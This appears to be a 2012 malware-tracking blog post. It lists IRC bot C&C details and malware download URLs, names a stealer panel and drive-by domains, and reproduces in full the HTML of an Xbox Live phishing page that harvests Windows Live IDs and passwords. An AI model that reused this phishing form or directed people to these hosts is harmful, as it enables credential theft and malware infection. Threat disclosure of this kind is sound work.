Resolved : [digested.maneradio.net] To [82.165.156.127]
Download URLs
hxxp://107.20.142.191/u/108730327/c.exe (dl.dropbox.com)
hxxp://74.208.112.117:6/.x/heroi.exe
C&C Server: 82.165.156.127:1866
Server Password:
Username: hh
Nickname: n[DEU|XP|DELL-D3E62F7E26]vddowpy
Channel: #!h! (Password: )
Channeltopic: :.load /99/106/112/81/55/59/40/110/116/35/105/120/111/108/117/108/110/38/127/122/100/56/126/9/18/40/39/45/57/39/42/56/55/44/98/14/100/123/108/
Topic By: [ tx ]
UPDATE:
concerning a post from Anonymous guy
i m adding this here with modifications to prevent accidental infections
Here is a smoke bin i believe with rootkit in it hxxps://dl.dropbox.com/u/104452013/chainzaio.exe and here is a java drive by with either athena,insomnia or Andromeda hxxp://freeunlimitedxboxcodes.tk have fun lol.
Here more about .tk drive by:
index.html:
<html>
<head>
<title>sean</title>
<meta name="description" content="sean">
<meta name="keywords" content="background,message,commons">
<script type="text/javascript">
var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-23441223-3']);
_gaq.push(['_setDomainName', 'none']);
_gaq.push(['_setAllowLinker', true]);
_gaq.push(['_trackPageview']);
(function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();
</script>
</head>
<frameset rows="*" framespacing="0" border="0" frameborder="NO">
<frame src="http://xboxcodesexploiter.yolasite.com/" name="dot_tk_frame_content" scrolling="auto" noresize>
</frameset>
<noframes>
<body>
</body>
</noframes>
</html>
here the redirects:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--
Design by Free CSS Templates
http://www.freecsstemplates.org
Released for free under a Creative Commons Attribution 2.5 License
Name : FronzenAge
Description: A two-column, fixed-width template suitable for business sites and blogs.
Version : 1.0
Released : 20071108
-->
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<title>sean</title>
<meta name="description" content="" />
<meta name="keywords" content="" />
<style type="text/css">
/*
Design by Free CSS Templates
http://www.freecsstemplates.org
Released for free under a Creative Commons Attribution 2.5 License
*/
* {
margin: 0;
padding: 0;
}
body {
background: #FFFFFF url(templates/FrozenAge2/resources/common/images/img01.gif) repeat-x;
font-family: "Trebuchet MS", Arial, Helvetica, sans-serif;
font-size: 13px;
color: #6E6E6E;
}
#sys_banner{
width:960px;
margin-left:auto; margin-right:auto;
}
/* Logo */
#logo {
width: 870px;
height: 135px;
margin: 0 auto;
}
#logo h1, #logo h2 {
margin: 0;
color:#242c36;
}
#logo h1 a{
color:#242c36;
}
#logo h1 {
float: left;
padding-top: 75px;
}
#logo h2 {
float: right;
padding-top: 95px;
font-size: 16px;
font-weight: normal;
}
#logo h2, #logo h2 a {
color: #939292;
}
#logo a {
text-decoration: none;
}
/* Menu */
#menu {
width: 960px;
height: 62px;
margin: 0 auto;
background: #252E3A url(templates/FrozenAge2/resources/common/images/img02.jpg) no-repeat;
}
#menu ul {
margin: 0;
padding: 21px 0 0 30px;
list-style: none;
line-height: normal;
}
#menu li {
float: left;
padding: 0 20px 0 22px;
background: url(templates/FrozenAge2/resources/common/images/img03.gif) no-repeat left center;
}
#menu li.first {
background: none;
}
#menu a {
text-decoration: none;
font-size: 14px;
font-weight: bold;
color: #FFFFFF;
}
/* Page */
#content {
width: 900px;
margin: 0 auto;
padding: 45px 35px 45px 25px;
background: url(templates/FrozenAge2/resources/common/images/img05.gif) no-repeat;
}
/* Content */
/*
#content {
float: left;
width: 603px;
}
*/
/* Footer */
.sys_footer {
clear: both;
width: 870px;
height: 40px;
margin: 0 auto;
padding: 35px 45px 0px 45px;
background: url(templates/FrozenAge2/resources/common/images/img05.gif) no-repeat;
text-align:center;
}
#sys_designerfooter {
border: none;
margin:0 auto;
padding: 0;
background: none;
position:relative;
top:-60px;
}
.sys_footer p {
margin: 0;
line-height: normal;
color: #B4B4B4;
}
.sys_footer a {
color: #B4B4B4;
}
.sys_footer .legal {
float: left;
}
.sys_footer .credit {
float: right;
}
.sys_txt{
margin: 0;
padding: 0;
font-family: "Trebuchet MS", Arial, Helvetica, sans-serif;
font-size: 13px;
color: #6E6E6E;
}
a{color:#346086;}
.sys_txt a img{
border : none;
}
.sys_txt a{
color: #346086;
}
.sys_txt a:hover{
text-decoration: none;
}
.sys_txt h1,
.sys_txt h2,
.sys_txt h3,
.sys_txt h4,
.sys_txt h5,
.sys_txt h6,
.sys_txt p{
font-weight: normal;
}
.sys_txt h1{
font-size : 2em;
color : #242c36;
letter-spacing : -2px;
}
.sys_txt h2{
font-size : 1.6em;
color : #242c36;
padding : 10px 0 10px 0;
letter-spacing : -1px;
}
.sys_txt h3{
font-size : 1em;
color : #242c36;
padding : 10px 0 10px 0;
}
.sys_txt h4{
font-size : 1em;
color : #242c36;
padding : 10px 0 10px 0;
}
.sys_txt h5{
font-size : 1em;
color : #242c36;
padding : 10px 0 10px 0;
}
.sys_txt h6{
font-size : 1em;
color : #242c36;
padding : 10px 0 10px 0;
}
.sys_txt p,
.sys_txt blockquote,
.sys_txt ul,
.sys_txt ol {
margin-bottom: 1.5em;
line-height: 1.8em;
padding-left :1em;
}
.sys_txt p{
margin:0;
padding:10px 0;
}
.sys_txt blockquote {
font-style : italic;
border-style : none;
margin-left : 2em;
margin:0;
padding:10px 30px;
}
.sys_txt ul,
.sys_txt ol{
font-family:Tahoma,Arial,Helvetica,sans-serif;
font-size:small;
font-size-adjust:none;
font-style:normal;
font-variant:normal;
font-weight:normal;
line-height:normal;
margin-left: 5em;
}
.sys_txt ul{
margin:0;
padding:10px 50px;
list-style: square;
}
.sys_txt ol{
margin:0;
padding:10px 50px; list-style: lower-roman;
}
.sys_txt ul li{
}
</style>
<link rel="stylesheet" type="text/css" href="classes/components/Form/layouts/Default/Default.css" /><script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js"></script><script type="text/javascript">window.jQuery || document.write('<script src="classes/commons/jquery/jquery-1.7.1.min.js"></script>')</script>
</head>
<body id="sys_background">
<div id="logo">
<h1 class="empty" style="text-align:left;"><a id="sys_heading" href="./" style="color:#242c36;font-size:26px;font-style:normal;font-weight:bold;text-decoration:none;"></a></h1>
</div>
<div id="menu">
<ul class='sys_navigation'>
<li class="first"><a href="./" title="Home">Home</a></li>
<li><a href="proof.php" title="Proof">Proof</a></li>
<li><a href="about.php" title="About">About</a></li>
</ul>
</div>
<div id="splash">
<div id="sys_banner" name="banner" style="height:147px;width:960px; background: url(resources/coollogo_com-12935788.png.cropped960x147o0%2C16s886x102.png) no-repeat;">
</div>
</div>
<!-- start page -->
<div id="content">
<div style="width: 100%; padding: 0px; margin: 0px" class="layout_1-column">
<div id="layout_row1">
<div id="sys_region_1" style="margin:0px; padding:5px; vertical-align:top; line-height:normal; min-width:100px" class="zone_top" ><div id="I17" style="display:block;clear: both;text-align:center;margin:10px 10px 10px 10px;" class="Social_LikeStrip_Default"><div>
<table cellpadding='0' cellspacing='0' style='width:100%;'>
<tr>
<td style='width:50%;'></td>
<td>
<table cellpadding='0' cellspacing='0'>
<tr>
<td style='vertical-align:bottom;'>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
<a href="http://twitter.com/share" class="twitter-share-button" data-lang="en" data-count="none">Tweet</a>
</td>
<td style='vertical-align:bottom;'>
<div style='padding:0 5px;'>
<iframe src="http://www.facebook.com/plugins/like.php?send=false&href=http%3A%2F%2Fxboxcodesexploiter.yolasite.com%2F&layout=button_count&show_faces=false&action=like&width=49&height=20&locale=en_US" scrolling="no" frameborder="0" style="border:none;overflow:hidden;width:49px;height:20px;" allowTransparency="true"></iframe>
</div>
</td>
<td style='vertical-align:bottom;'>
<script type="text/javascript" src="https://apis.google.com/js/plusone.js">
{lang: 'en-US'}
</script>
<g:plusone size="medium" count="false"></g:plusone>
<script type="text/javascript">gapi.plusone.go();</script>
</td>
</tr>
</table>
</td>
<td style='width:50%;'></td>
</tr>
</table>
</div></div><div id="I21" style="display:block;clear: both;text-align:center;" class="GoogleAdSense_Default"></div><div id="I22" style="display:block;clear: both;margin:10px 10px 10px 10px;" class="Horizontal_Line_Default"> <div style='border-bottom-width:1px;border-bottom-style:solid;border-bottom-color:#cccccc;font-size:0;padding:0;margin:0;height:0;line-height:0;'></div>
</div><div id="I16" style="display:block;clear: both;" class="Form_Default"><div class="sys_yola_form">
<form method='post' action='http://forms.yola.com/formservice/en/c3f8653cf6bc4b77b3fb6becfe738162/8a49866b3a06a8b4013a0a4a083253c9/8a49866b3a06a8b4013a0a4a084d53ca/I16/'>
<div class='yola-form-field'>
<p class='label'><label for='yola_form_widget_I16_0'>Windows live id</label></p>
<input id='yola_form_widget_I16_0' class='text' name='0<text>' type='text' value='' />
<input type='hidden' name='0<label>' value='Windows live id' />
</div>
<div class='yola-form-field'>
<p class='label'><label for='yola_form_widget_I16_1'>Account password</label></p>
<input id='yola_form_widget_I16_1' class='text' name='1<text>' type='text' value='' />
<input type='hidden' name='1<label>' value='Account password' />
</div>
<div class='yola-form-field'>
<p class='label'><label for='yola_form_widget_I16_2'>What you wan't</label></p>
<select id='yola_form_widget_I16_2' name='2<list>'>
<option value='48 hour trial'>48 hour trial</option><br />
<option value='1 month xbox gold'>1 month xbox gold</option><br />
<option value='3 months of xbox gold'>3 months of xbox gold</option><br />
<option value='12 months of xbox gold'>12 months of xbox gold</option><br />
<option value='160 Microsoft points'>160 Microsoft points</option><br />
<option value='1600 Microsoft points'>1600 Microsoft points</option><br />
<option value='4000 Microsoft points'>4000 Microsoft points</option><br />
</select>
<input type='hidden' name='2<label>' value='What you wan't' />
</div>
<input type='hidden' name='redirect' value='http://xboxcodesexploiter.yolasite.com/?formI16Posted=true' />
<input type='hidden' name='redirect_fail' value='http://xboxcodesexploiter.yolasite.com/?formI16PostFailed=true' />
<input type='hidden' name='form_name' value='' />
<input type='hidden' name='site_name' value='sean' />
<input type='hidden' name='destination' value='1Qh4a682H62S1P4Tycj48xLmobIkzlipU1o=:RtGwf7dhwaQhbXMBthrD38eWKotEi_igFka46FSurbo=' />
<p><input class='submit' type="submit" value="Exploit" /></p>
</form>
</div></div></div>
</div>
</div>
</div>
<!-- end page -->
<div id='sys_footer' class='sys_footer'></div>
<style type="text/css">
#sys_yolacredit_wrap{text-align:center;}
#sys_yolacredit{text-align:center;line-height:1.2em;margin:1em auto;font-family:Arial;position:relative;background:#fff url(classes/commons/yola_footer/png/sprites.png) top right no-repeat;border-top:1px solid #e1e1e1;border-bottom:1px solid #e1e1e1;padding:13px 73px 15px 17px;color:#222;font-size:18px;display:inline-block;}
#sys_yolacredit p{margin:0;padding:0;line-height:1.2em;}
#sys_yolacredit p a{color:#222;text-decoration:none;}
#sys_yolacredit p a:hover{text-decoration:underline;}
#sys_yolacredit_message{display:none;color:red;padding:20px 20px 20px 110px;background:url(classes/commons/yola_footer/png/sprites.png) 20px center no-repeat;position:absolute;top:0;right:0;z-index:1;}
#sys_yolacredit_message_wrap{display:none;position:absolute;top:0;right:0;padding-bottom:25px;background:url(classes/commons/yola_footer/png/sprites.png) bottom left no-repeat;}
#sys_yolacredit_message_wrap_inner{font-size:13px;opacity:.8;filter: alpha(opacity = 80);background:#797979;-moz-border-radius:8px;-khtml-border-radius:8px;-webkit-border-radius:8px;border-radius:8px;}
#sys_yolacredit_message p{width:260px;padding:5px 0;margin:0;text-align:left;color:#fff;font-size:13px;background:transparent;position:relative;}
#sys_yolacredit a.yola{font-size:0;position:absolute;top:5px;right:0;display:inline-block;width:65px;height:37px;float:right;text-decoration:none;color:"#fff";}
#sys_yolacredit a.yola:hover;{text-decoration:none;}
#sys_yolacredit a.yola span{display:none;}
</style>
<!--[if lte IE 6]>
<style type="text/css">
#sys_yolacredit{background:#fff url(classes/commons/yola_footer/gif/sprites.gif) top right no-repeat;}
#sys_yolacredit_message{background:url(classes/commons/yola_footer/gif/sprites.gif) 20px center no-repeat;}
#sys_yolacredit_message_wrap{background:url(classes/commons/yola_footer/gif/sprites.gif) bottom left no-repeat;}
#sys_yolacredit_message_wrap_inner{filter: alpha(opacity = 100);}
</style>
<![endif]-->
<div id="sys_yolacredit_wrap">
<span id="sys_yolacredit" style="" title="Visit Yola.com to create your own free website">
<div id="sys_yolacredit_message">
<p>This free website was made using Yola.</p>
<p>No HTML skills required. Build your website in minutes.</p>
<p>Go to www.yola.com and sign up today!</p>
</div>
<div id="sys_yolacredit_message_wrap">
<div id="sys_yolacredit_message_wrap_inner"></div>
</div>
<p>Make a <a href="http://www.yola.com/">free website</a> with <a class="yola" href="http://www.yola.com/"><span>Yola</span></a></p>
</span>
</div>
<script type="text/javascript">
document.getElementById("sys_yolacredit").onmouseover = function(){
var m = document.getElementById("sys_yolacredit_message"),
w = document.getElementById("sys_yolacredit_message_wrap"),
n = document.getElementById("sys_yolacredit_message_wrap_inner");
m.style.display = "block";
w.style.display = "block";
m.style.top = (m.offsetHeight * -1 - 15) + "px";
w.style.top = m.style.top;
m.style.right = (m.offsetWidth * -1 + 78) + "px";
w.style.right = m.style.right;
n.style.width = m.offsetWidth + "px";
n.style.height = m.offsetHeight + "px";
};
document.getElementById("sys_yolacredit").onmouseout = function(){
document.getElementById("sys_yolacredit_message").style.display = "none";
document.getElementById("sys_yolacredit_message_wrap").style.display = "none";
};
</script>
<script type="text/javascript">
var _yts = _yts || [];
_yts.push(["_siteId", "8a49866b3a06a8b4013a0a4a083253c9"]);
_yts.push(["_trackPageview"]);
(function() {
var yts = document.createElement("script");
yts.type = "text/javascript";
yts.async = true;
yts.src = "http://analytics.yola.net/tracking.js";
(document.getElementsByTagName("head")[0] || document.getElementsByTagName("body")[0]).appendChild(yts);
})();
</script><!-- Start Quantcast tag -->
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<script type="text/javascript">_qacct="p-b8x17GqsQ_656";quantserve();</script>
<noscript>
<a href="http://www.quantcast.com/p-b8x17GqsQ_656" target="_blank"><img src="http://pixel.quantserve.com/pixel/p-b8x17GqsQ_656.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/></a>
</noscript>
<!-- End Quantcast tag --></body>
</html>
hosting infos:
http://whois.domaintools.com/82.165.156.127
I_Post_Ur_Info - September 28, 2012 at 11:56 pm
Eh, file is just a stealer, probably ISR, in a password protected 7zip file inside of a self extracting 7zip archive. Panel is here: smokeindrostealer.binhoster.com
JDB is just a xbox live account phish.